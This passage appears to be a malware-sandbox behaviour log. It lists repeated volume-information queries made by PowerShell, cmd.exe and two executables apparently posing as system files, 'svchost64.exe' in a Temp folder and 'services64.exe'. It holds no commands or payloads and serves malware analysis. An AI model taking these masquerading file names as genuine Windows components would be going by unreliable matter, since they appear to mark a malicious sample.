                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\services64.exe | Queries volume information: C:\Windows\System32\services64.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\services64.exe | Queries volume information: C:\Windows\System32\services64.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
